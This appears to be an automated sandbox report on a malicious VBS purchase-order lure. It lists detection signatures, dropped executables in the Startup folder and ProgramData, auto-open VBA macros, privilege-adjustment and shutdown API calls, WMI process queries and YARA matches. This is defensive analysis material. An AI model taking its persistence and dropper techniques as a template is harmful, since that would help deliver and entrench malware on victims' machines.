                                Source: HTAGVDFUIE.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: 32pAPMdc.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: HTAGVDFUIE.xlsm.8.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: Purchase Order No. G02873362-Docx.vbs Static file information: Suspicious name
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,7_2_001E29C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_002502AA NtdllDialogWndProc_W,7_2_002502AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,7_2_0024E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024EA4E NtdllDialogWndProc_W,7_2_0024EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001FAC99 NtdllDialogWndProc_W,7_2_001FAC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,7_2_0024ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001FAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,7_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,7_2_0024EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001FAFB4 GetParent,NtdllDialogWndProc_W,7_2_001FAFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,7_2_0024F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,7_2_0024F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F37C NtdllDialogWndProc_W,7_2_0024F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F3AB NtdllDialogWndProc_W,7_2_0024F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F3DA NtdllDialogWndProc_W,7_2_0024F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F425 NtdllDialogWndProc_W,7_2_0024F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,7_2_0024F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,7_2_0024F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001FB7F2 NtdllDialogWndProc_W,7_2_001FB7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_001FB845 NtdllDialogWndProc_W,7_2_001FB845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 7_2_0024FE80 NtdllDialogWndProc_W,7_2_0024FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,7_2_0024FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,7_2_0024FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,16_2_00E029C2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E702AA NtdllDialogWndProc_W,16_2_00E702AA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6E769 NtdllDialogWndProc_W,CallWindowProcW,16_2_00E6E769
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6EA4E NtdllDialogWndProc_W,16_2_00E6EA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,16_2_00E6ECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AC99 NtdllDialogWndProc_W,16_2_00E1AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,16_2_00E1AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,16_2_00E6EFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1AFB4 GetParent,NtdllDialogWndProc_W,16_2_00E1AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F0A1 SendMessageW,NtdllDialogWndProc_W,16_2_00E6F0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,16_2_00E6F122
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F3DA NtdllDialogWndProc_W,16_2_00E6F3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F3AB NtdllDialogWndProc_W,16_2_00E6F3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F37C NtdllDialogWndProc_W,16_2_00E6F37C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F45A ClientToScreen,NtdllDialogWndProc_W,16_2_00E6F45A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F425 NtdllDialogWndProc_W,16_2_00E6F425
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00E6F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F594 GetWindowLongW,NtdllDialogWndProc_W,16_2_00E6F594
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1B7F2 NtdllDialogWndProc_W,16_2_00E1B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1B845 NtdllDialogWndProc_W,16_2_00E1B845
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FE80 NtdllDialogWndProc_W,16_2_00E6FE80
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,16_2_00E6FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,16_2_00E6FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,22_2_001E29C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002502AA NtdllDialogWndProc_W,22_2_002502AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024E769 NtdllDialogWndProc_W,CallWindowProcW,22_2_0024E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024EA4E NtdllDialogWndProc_W,22_2_0024EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAC99 NtdllDialogWndProc_W,22_2_001FAC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,22_2_0024ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,22_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,22_2_0024EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAFB4 GetParent,NtdllDialogWndProc_W,22_2_001FAFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,22_2_0024F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,22_2_0024F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F37C NtdllDialogWndProc_W,22_2_0024F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F3AB NtdllDialogWndProc_W,22_2_0024F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F3DA NtdllDialogWndProc_W,22_2_0024F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F425 NtdllDialogWndProc_W,22_2_0024F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,22_2_0024F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,22_2_0024F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FB7F2 NtdllDialogWndProc_W,22_2_001FB7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FB845 NtdllDialogWndProc_W,22_2_001FB845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FE80 NtdllDialogWndProc_W,22_2_0024FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,22_2_0024FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,22_2_0024FF91
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022702F: DeviceIoControl,CloseHandle,7_2_0022702F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74755590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,7_2_0021B9F1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_002282D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00E482D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_002282D0
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Private Sub Workbook_Open()
                                Source: 32pAPMdc.xlsm.8.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Private Sub Workbook_Open()
                                Source: HTAGVDFUIE.xlsm.8.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox View Dropped File: C:\ProgramData\Synaptics\RCX4F1F.tmp 7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                Source: Joe Sandbox View Dropped File: C:\ProgramData\Synaptics\Synaptics.exe 6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe 6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: String function: 00E1F885 appears 67 times
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: String function: 00E27750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001FF885 appears 134 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 0020247B appears 36 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 0020017E appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00210650 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001F2570 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00201BC7 appears 41 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001E5CD3 appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001ECAEE appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001FC619 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00207750 appears 84 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 001FE3CC appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00208AE8 appears 46 times
                                Source: Purchase Order No. G02873362-Docx.vbs Initial sample: Strings found which are bigger than 50
                                Source: RNEQTT[1].exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: RNEQTT[1].exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: update.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: update.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX4F1F.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.8.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@25/34@22/5
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022D712 GetLastError,FormatMessageW,7_2_0022D712
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,7_2_0021B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_0021BEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3B8B0 AdjustTokenPrivileges,CloseHandle,16_2_00E3B8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00E3BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,22_2_0021B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_0021BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,7_2_0022EA85
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,7_2_00226F5B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022EFCD CoInitialize,CoCreateInstance,CoUninitialize,7_2_0022EFCD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,7_2_001E31F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761289486.0000022996F9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
